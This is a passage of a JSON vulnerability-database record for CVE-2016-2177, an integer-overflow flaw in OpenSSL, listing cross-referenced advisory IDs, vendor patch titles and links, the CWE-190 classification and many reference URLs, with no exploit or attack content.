"SEVD-2018-137-01", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.1 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-003304", "trust": 0.8 }, { "db": "VULMON", "id": "CVE-2016-2177", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140717", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143176", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143181", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143628", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140850", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2177" }, { "db": "BID", "id": "91319" }, { "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "db": "PACKETSTORM", "id": "140717" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "143628" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "140850" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2177" } ] }, "id": "VAR-201606-0478", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4102494200000001 }, "last_update_date": "2024-07-22T21:45:06.283000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "hitachi-sec-2017-103", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hitachi-sec-2017-103/index.html" }, { "title": "HPSBGN03658", "trust": 0.8, "url": "https://h20565.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05302448" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "SB10165", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10165" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Avoid some undefined pointer arithmetic", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=a004e72b95835136d3f1ea90517f706c24c03da7" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "Bug 1341705", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1341705" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "HS16-023", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-023/index.html" }, { "title": "hitachi-sec-2017-103", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hitachi-sec-2017-103/index.html" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171659 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171658 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 7", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170194 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 6", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170193 - security advisory" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Red Hat: CVE-2016-2177", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2177" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-2177" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3181-1" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "CVE Scanning of Alpine base images using Multi Stage builds in Docker 17.05\nSummary", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "hackerone-publicy-disclosed", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " }, { "title": "OpenSSL-CVE-lib", "trust": 0.1, "url": "https://github.com/chnzzh/openssl-cve-lib " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2177" }, { "db": "JVNDB", "id": "JVNDB-2016-003304" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-190", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "db": "NVD", "id": "CVE-2016-2177" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.4, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10165" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2017:1658" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2017:0194" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2017-1659.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.2, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-144-01" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-3181-1" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1341705" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91319" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1036088" }, { "trust": 1.1, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.1, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.1, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03763en_us" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2017:0193" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.1, "url": "https://www.schneider-electric.com/en/download/document/sevd-2018-144-01/" }, { "trust": 1.1, "url": "https://www.schneider-electric.com/en/download/document/sevd-2018-137-01/" }, { "trust": 1.1, "url": "https://www.citect.schneider-electric.com/safety-and-security-central/36-security-notifications/9134-vulnerabilities-within-schneider-electric-floating-license-manager" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10215" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k23873366" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3673" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/archive/1/540957/100/0/threaded" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html" }, { "trust": 1.1, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/9" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html" }, { "trust": 1.1, "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2017/jul/31" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/540957/100/0/threaded" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=a004e72b95835136d3f1ea90517f706c24c03da7" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2177" }, { "trust": 0.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-18-144-01" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2177" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.3, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=a004e72b95835136d3f1ea90517f706c24c03da7" }, { "trust": 0.3, "url": "https://github.com/openssl/openssl/commit/a004e72b95835136d3f1ea90517f706c24c03da7" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995935" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991896" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099492" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994870" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993601" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21994534" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994861" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995038" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995129" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg22001805" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8610" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-6808" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-8612" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.2, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-8610" }, { "trust": 0.2, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/190.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2017:1659" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3181-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49001" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4459" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8612" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6808" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03763en_us" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1838" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1839" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4483" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": 